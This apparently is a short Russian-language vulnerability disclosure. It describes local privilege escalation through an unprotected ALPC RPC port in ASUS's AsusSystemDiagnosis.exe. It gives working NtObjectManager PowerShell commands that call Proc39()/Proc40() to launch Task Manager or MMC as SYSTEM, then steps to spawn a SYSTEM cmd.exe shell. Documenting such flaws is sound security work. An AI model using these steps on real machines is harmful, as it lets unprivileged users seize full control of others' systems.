
Повышение привилегий — AsusSystemDiagnosis.exe — Proc39()
Полный путь: C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe
Проблема:
Порт ALPC \RPC Control\ASHWTestServer, предоставляемый AsusSystemDiagnosis.exe, полностью доступен любому пользователю. Вызов Proc39() через RPC через этот порт запускает процесс taskmgr.exe от имени SYSTEM в сессии текущего пользователя.
Эксплуатация:
Используя инструмент NtObjectManager RPC от Project Zero с https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools (убедитесь, что взяли скомпилированный релиз), можно подключиться к уязвимому RPC-порту и вызвать Proc39(). После запуска процесса taskmgr.exe от имени SYSTEM можно создать оболочку cmd.exe, воспользовавшись функцией "Run New Task" через контекстное меню: File > Run New Task > cmd.exe.
NtObjectManager:
$server = get-rpcserver C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe
$client = get-rpcclient $server
$client.connect()
$client.Proc39()
Повышение привилегий — AsusSystemDiagnosis.exe — Proc40()
То же, что и выше, но запускает mmc.exe от имени system. Можно либо создать новую задачу, либо воспользоваться функцией обзора, чтобы открыть окно explorer.exe и выполнить cmd.exe из адресной строки.
Дополнительные примечания:
Proc53() — запускает systemreset.exe от имени SYSTEM Proc54() — запускает RecoveryDrive.exe от имени SYSTEM